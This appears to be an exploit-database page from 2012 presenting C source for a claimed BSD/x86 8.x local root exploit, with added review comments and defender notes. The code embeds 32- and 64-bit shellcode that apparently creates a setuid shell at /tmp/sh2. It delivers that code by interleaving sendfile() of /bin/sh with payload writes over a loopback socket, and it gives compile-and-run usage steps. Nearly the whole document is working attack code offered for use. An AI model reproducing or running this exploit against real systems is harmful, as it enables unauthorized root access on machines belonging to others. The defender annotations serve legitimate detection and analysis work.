bsd/x86 Ver. 8.x - Local Root Exploit



EKU-ID: 2653 CVE: OSVDB-ID:
Author: TAURUS OMAR Published: 2012-09-25 Verified: Verified


 

/*
 *
 *
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 * 0      _                   __           __       __                      1
 * 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 * 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 * 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 * 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 * 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 * 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 * 1                   \ \____/ >> Exploit database separated by exploit    0
 * 0                    \/___/          type (local, remote, DoS, etc.)     1
 * 1                                                                        1
 * 0   [x] Official Website: http://www.1337day.com                         0
 * 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 * 0                                                                        0
 * 1               ==========================================               1
 * 0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
 * 1               ==========================================               0
 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
 * |                                                                        |
 * |                 BSD/x86  Ver. 8.x - Local Root Exploit                 |     
 * --------------------------------------------------------------------------
 * 
 * +----------------| ABOUT ME |--------------------+
 * NAME:     TAURUS OMAR                            -
 * LINE:     INDEPENDENT SECURITY RESEARCHER        -
 * HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
 * TWITTER:  @taurusomar_                           -
 * E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
 * E-MAIL:   omar-taurus[at]live[dot]com            -
 * PWNED:    #ZUUU                                  -
 * +------------------------------------------------+ 
 *
 *
 * +-------------------------------+
 * Proof of CONCEPT IMAGES 
 * http://i.imgur.com/whR3E.jpg
 * +-------------------------------+
 * Usage: 
 * gcc 1337.c -o 1337
 * chmod 777 1337
 * ./1337
 *
 */

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/proc.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
 
/*
 * main - driver of the proof of concept that the file banner labels a
 * "local root" for BSD/x86 8.x.
 *
 * What the visible code does:
 *   1. Requires exactly one argument, "i386" or "amd64", which selects one
 *      of two embedded machine-code byte strings (str32 / str64).
 *   2. Connects a TCP socket to 127.0.0.1:7030.  Nothing in this file
 *      creates that listener, so it has to exist already.
 *   3. Opens /bin/sh read-only and, until st_size bytes have been counted,
 *      alternates between write()ing "0x90 filler + embedded bytes" to the
 *      socket and calling sendfile() on /bin/sh at a fixed file offset.
 *
 * NOTE(review): the page lists no CVE or advisory id.  The pattern
 * (sendfile() of a system binary over loopback, interleaved with
 * caller-chosen bytes) presumably targets a kernel flaw in how file-backed
 * network buffers are handled -- map it to the vendor advisory and patch
 * level before trusting the "8.x" claim in the title.
 *
 * Defender notes (derived from constants visible below):
 *   - The payload bytes contain the ASCII path "/tmp/sh2" and the constant
 *     0x0ded (octal 06755, i.e. setuid + setgid + 0755).  Unexpected set-id
 *     files under /tmp are the obvious artefact to hunt for; mounting /tmp
 *     nosuid removes the value of such a file.
 *   - An unprivileged process that holds /bin/sh open and issues sendfile()
 *     towards a loopback port is unusual enough to alert on.
 *   - After suspected use, compare /bin/sh as the running system serves it
 *     against a known-good checksum.
 *
 * Returns: nothing meaningful -- main is declared without a return type
 * (implicit int) and every exit path is a bare "return;" or falls off the
 * end.
 */
main (int argc, char *argv[]) {
        int s, f, k2;           /* s: loopback socket, f: fd of /bin/sh, k2: filler index */
        struct sockaddr_in addr;
        int flags;
        /*
         * Opaque x86 machine code for the 32-bit case.  Visible in the bytes:
         * the ASCII fragments "/sh2" and "/tmp", the immediate 0x00000ded, and
         * the values 0x10, 0x0f and 0x3b loaded before "cd 80" (int 0x80).
         * NOTE(review): in the FreeBSD syscall table those numbers would be
         * chown, chmod and execve -- confirm with a disassembler; the bytes
         * were not verified as part of this review.
         */
        char str32[]=
"\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
        /*
         * 64-bit counterpart.  Visible in the bytes: ASCII "/tmp/sh" and
         * "/tmp/sh2", the 16-bit immediate 0x0ded, the values 0x0f and 0x3b,
         * and "0f 05" (syscall).  Same caveat: treat as untrusted, unverified
         * machine code.
         */
        char str64[]=
"\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x74\x6d\x70\x2f\x73\x68"
"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
"\xe7\x57\x52\x48\x89\xe6\x0f\x05";
 
        char buf[20000];        /* staging buffer for filler + payload; only the first n bytes are sent */
 
        char *p;
        struct stat sb;
        int n;                  /* reused: syscall return value and, later, byte count for write() */
        fd_set wset;
        int64_t size;           /* remaining byte budget, initialised from the size of /bin/sh */
        off_t sbytes;           /* bytes reported sent by the last sendfile() call */
        off_t sent = 0;         /* running total; written but never read in this function */
        int chunk;              /* bytes still to push with sendfile() before the next write() */
        int arch = 3;           /* 1 = i386, 2 = amd64, 3 = not recognised */
 
        /* Exactly one argument is required; the message is the original Spanish text. */
        if (argc != 2) {
                printf("Definiendo Arquitectura.\n");
                return;
        }
 
        if (strcmp(argv[1], "i386") == 0)
                arch=1;
 
        if (strcmp(argv[1], "amd64") == 0)
                arch=2;
 
        /* Any other argument leaves arch at 3 and ends the program here. */
        if (arch == 3) {
                printf("Arquitectura Definida i386 or amd64\n");
                return;
        }
 
        /* TCP connection to a listener on loopback port 7030 (not created by this file). */
        s = socket(AF_INET, SOCK_STREAM, 0);
        bzero(&addr, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(7030);
        addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 
        /* Failures below are only reported with warn(); execution continues regardless. */
        n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
        if (n < 0)
                warn ("fail to connect");
 
        /* /bin/sh is opened read-only: the process needs no write permission on the file. */
        f = open("/bin/sh", O_RDONLY);
        if (f<0)
                warn("fail to open file");
        n = fstat(f, &sb);
        if (n<0)
                warn("fstat failed");
 
        size = sb.st_size;
        chunk = 0;
 
        /* O_NONBLOCK is set on f (the file descriptor), not on the socket s. */
        flags = fcntl(f, F_GETFL);
        flags |= O_NONBLOCK;
        fcntl(f, F_SETFL, flags);
 
        /* Loop until sendfile() has accounted for st_size bytes. */
        while (size > 0) {
 
                /* Wait until the socket is writable; nfds is f+1 while only s is in the set. */
                FD_ZERO(&wset);
                FD_SET(s, &wset);
                n = select(f+1, NULL, &wset, NULL, NULL);
                if (n < 0)
                        continue;       /* select() errors are retried without limit */
 
                if (chunk > 0) {
                        /*
                         * sendfile(fd, socket, offset, nbytes, hdtr, sbytes, flags):
                         * pushes up to chunk bytes of /bin/sh into the socket,
                         * starting at file offset 4096 (i386) or 7224 (amd64).
                         */
                        sbytes = 0;
                        if (arch == 1)
                        n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
                        if (arch == 2)
                        n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
                        if (n < 0)
                                continue;       /* errors are retried; counters stay unchanged */
                        chunk -= sbytes;
                        size -= sbytes;
                        sent += sbytes;
                        continue;
                }
 
                /* chunk is exhausted: arm the next 2048-byte sendfile() round and send the payload. */
                chunk = 2048;
 
                memset(buf, '\0', sizeof buf);
                if (arch == 1) {
                        /* 256 bytes of 0x90 (x86 NOP) filler, then str32 including its trailing NUL. */
                        for (k2=0;k2<256;k2++) {
                                buf[k2] = 0x90;
                        }
                        p = buf;
                        p = p + k2;
                        memcpy(p, str32, sizeof str32);
 
                        n = k2 + sizeof str32;
                        p = buf;
                }
 
                if (arch == 2) {
                        /* 100 bytes of 0x90 filler, then str64 including its trailing NUL. */
                        for (k2=0;k2<100;k2++) {
                                buf[k2] = 0x90;
                        }
                        p = buf;
                        p = p + k2;
                        memcpy(p, str64, sizeof str64);
 
                        n = k2 + sizeof str64;
                        p = buf;
                }
 
                /* Filler + payload go out on the same socket; the return value of write() is ignored. */
                write(s, p, n);
        }
}